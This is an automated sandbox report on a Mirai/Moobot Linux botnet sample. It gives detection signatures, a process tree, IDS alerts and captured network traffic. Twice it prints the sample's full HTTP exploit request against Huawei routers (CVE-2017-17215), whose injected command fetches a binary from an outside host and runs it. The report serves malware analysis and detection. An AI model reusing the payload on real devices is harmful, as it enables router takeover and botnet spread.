Linux Analysis Report
OMnylKuNNF.elf

Overview

General Information

Sample Name:OMnylKuNNF.elf
Original Sample Name:8406babfb9b432ee244575aa2e3f63fe.elf
Analysis ID:831159
MD5:8406babfb9b432ee244575aa2e3f63fe
SHA1:22761d5d5c43e0251bab907054066239a8f35b61
SHA256:9a067e32dd6c25053c302de7caf61cdc0f3982289eb91d06c449fe08a47fc6d3
Tags:64 elf mirai
Infos:

Detection

Mirai, Moobot
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

None of the HTTP servers contacted by the sample answer. The sample is likely an old dropper which no longer works.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:831159
Start date and time:2023-03-21 07:09:07 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 24s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:OMnylKuNNF.elf
Original Sample Name:8406babfb9b432ee244575aa2e3f63fe.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@1/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/OMnylKuNNF.elf
PID:6227
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:sh: 1: cannot create 2bin/systemd: Directory nonexistent
chmod: cannot access 'bin/systemd': No such file or directory
  • system is lnxubuntu20
  • OMnylKuNNF.elf (PID: 6227, Parent: 6126, MD5: 8406babfb9b432ee244575aa2e3f63fe) Arguments: /tmp/OMnylKuNNF.elf
    • sh (PID: 6228, Parent: 6227, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/systemd && mkdir bin; >2\\xffbin/systemd && mv /tmp/OMnylKuNNF.elf bin/systemd; chmod 777 bin/systemd"
      • sh New Fork (PID: 6229, Parent: 6228)
      • rm (PID: 6229, Parent: 6228, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/systemd
      • sh New Fork (PID: 6230, Parent: 6228)
      • mkdir (PID: 6230, Parent: 6228, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6231, Parent: 6228)
      • chmod (PID: 6231, Parent: 6228, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/systemd
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name: MooBot
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Source | Rule | Description | Author | Strings
OMnylKuNNF.elf | JoeSecurity_Moobot | Yara detected Moobot | Joe Security
OMnylKuNNF.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
OMnylKuNNF.elf | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown
OMnylKuNNF.elf | Linux_Trojan_Gafgyt_9e9530a7 | unknown | unknown
  • 0x912c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
OMnylKuNNF.elf | Linux_Trojan_Gafgyt_807911a2 | unknown | unknown
  • 0x97df:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D

Source | Rule | Description | Author | Strings
6227.1.0000000000400000.000000000040f000.r-x.sdmp | JoeSecurity_Moobot | Yara detected Moobot | Joe Security
6227.1.0000000000400000.000000000040f000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
6227.1.0000000000400000.000000000040f000.r-x.sdmp | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown
6227.1.0000000000400000.000000000040f000.r-x.sdmp | Linux_Trojan_Gafgyt_9e9530a7 | unknown | unknown
  • 0x912c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
6227.1.0000000000400000.000000000040f000.r-x.sdmp | Linux_Trojan_Gafgyt_807911a2 | unknown | unknown
  • 0x97df:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D

Timestamp | SID | Source IP | Source Port | Destination IP | Destination Port | Protocol | Classtype
03/21/23-07:11:34.483333 | 2835222 | 192.168.2.23 | 55812 | 197.39.195.63 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:10:23.199102 | 2835222 | 192.168.2.23 | 40346 | 197.234.59.53 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:11:56.415741 | 2835222 | 192.168.2.23 | 36620 | 147.46.122.92 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:10:55.747017 | 2835222 | 192.168.2.23 | 52978 | 41.233.131.219 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:09:52.583756 | 2023883 | 192.168.2.23 | 54536 | 8.8.8.8 | 53 | UDP | Potentially Bad Traffic
03/21/23-07:11:48.637846 | 2030489 | 156.224.24.249 | 56999 | 192.168.2.23 | 47796 | TCP | A Network Trojan was detected
03/21/23-07:10:30.344361 | 2835222 | 192.168.2.23 | 39138 | 41.36.213.188 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:10:07.047772 | 2835222 | 192.168.2.23 | 59102 | 197.39.34.188 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:10:54.644031 | 2835222 | 192.168.2.23 | 58844 | 86.69.66.253 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:09:59.757322 | 2835222 | 192.168.2.23 | 54656 | 157.157.112.175 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:11:38.525358 | 2835222 | 192.168.2.23 | 43698 | 172.65.204.144 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:11:01.870921 | 2835222 | 192.168.2.23 | 48276 | 197.39.190.244 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:11:51.897568 | 2835222 | 192.168.2.23 | 47544 | 41.62.43.160 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:10:39.495843 | 2835222 | 192.168.2.23 | 39372 | 197.39.167.71 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:11:41.620198 | 2835222 | 192.168.2.23 | 49098 | 197.148.89.120 | 37215 | TCP | A Network Trojan was detected
03/21/23-07:09:52.816652 | 2030490 | 192.168.2.23 | 47796 | 156.224.24.249 | 56999 | TCP | A Network Trojan was detected
03/21/23-07:11:34.410258 | 2835222 | 192.168.2.23 | 53290 | 213.176.10.176 | 37215 | TCP | A Network Trojan was detected

          AV Detection

          Source: OMnylKuNNF.elf, ReversingLabs: Detection: 56%
          Source: OMnylKuNNF.elf, Virustotal: Detection: 58%
          Source: OMnylKuNNF.elf, Joe Sandbox ML: detected

          Networking

          Source: Traffic, Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:54536 -> 8.8.8.8:53
          Source: Traffic, Snort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47796 -> 156.224.24.249:56999
          Source: Traffic, Snort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47796
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54656 -> 157.157.112.175:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59102 -> 197.39.34.188:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40346 -> 197.234.59.53:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39138 -> 41.36.213.188:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39372 -> 197.39.167.71:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58844 -> 86.69.66.253:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52978 -> 41.233.131.219:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48276 -> 197.39.190.244:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53290 -> 213.176.10.176:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55812 -> 197.39.195.63:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43698 -> 172.65.204.144:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49098 -> 197.148.89.120:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47544 -> 41.62.43.160:37215
          Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36620 -> 147.46.122.92:37215
          Source: global traffic, TCP traffic: 197.129.229.190 ports 1,2,3,5,7,37215
          Source: global traffic, TCP traffic: 197.128.125.185 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.24.148.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.79.86.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 107.242.78.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.127.148.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.31.119.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 18.224.164.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.228.195.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.159.72.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.254.98.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.9.196.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 32.233.9.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 217.246.124.252:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.246.94.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.150.88.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 78.184.104.146:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.177.73.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.159.188.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.3.48.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.9.144.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.98.150.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.105.56.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.88.183.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.252.107.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.219.4.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.42.63.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.175.141.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 80.184.137.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 152.194.50.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.52.67.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.139.235.193:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 59.182.205.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.178.237.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.38.179.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.61.210.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.39.81.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.232.8.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.20.8.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 74.15.160.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 46.8.7.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 213.31.30.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.55.82.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 42.213.57.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.10.19.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.94.164.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.39.41.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.241.187.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.142.169.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.28.51.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.151.191.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.174.59.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.147.151.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.78.207.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.90.203.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.133.114.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.244.20.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.195.204.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.81.168.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.169.244.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.171.80.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.225.96.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 58.45.54.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.62.218.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.124.1.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.97.5.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 146.127.42.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.64.191.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 152.223.110.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.66.151.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 175.102.246.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.0.166.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.48.74.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.248.9.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.160.235.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.193.97.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 51.246.40.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 69.112.15.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.44.21.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.69.69.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.88.70.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 79.13.26.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.7.233.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 85.187.202.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.72.170.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.89.85.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.88.101.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.227.103.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.146.165.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.21.244.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.218.160.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.39.144.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.46.170.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.34.43.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 2.169.112.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.5.4.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 112.250.62.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.22.11.240:37215
          Source: global traffic
          TCP traffic: 192.168.2.23:47796 -> 156.224.24.249:56999
          Source: global traffic
          HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Connection: keep-alive
          Accept: */*
          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
          Content-Length: 457
          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknown, Network traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknown, Network traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknown, TCP traffic detected without corresponding DNS query
          Source: OMnylKuNNF.elf, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: OMnylKuNNF.elf, String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknown, HTTP traffic detected:
          POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Connection: keep-alive
          Accept: */*
          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
          Content-Length: 457
          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknown, DNS traffic detected: queries for: j.xnyidc.top

          System Summary

          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: Process Memory Space: OMnylKuNNF.elf PID: 6227, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: OMnylKuNNF.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
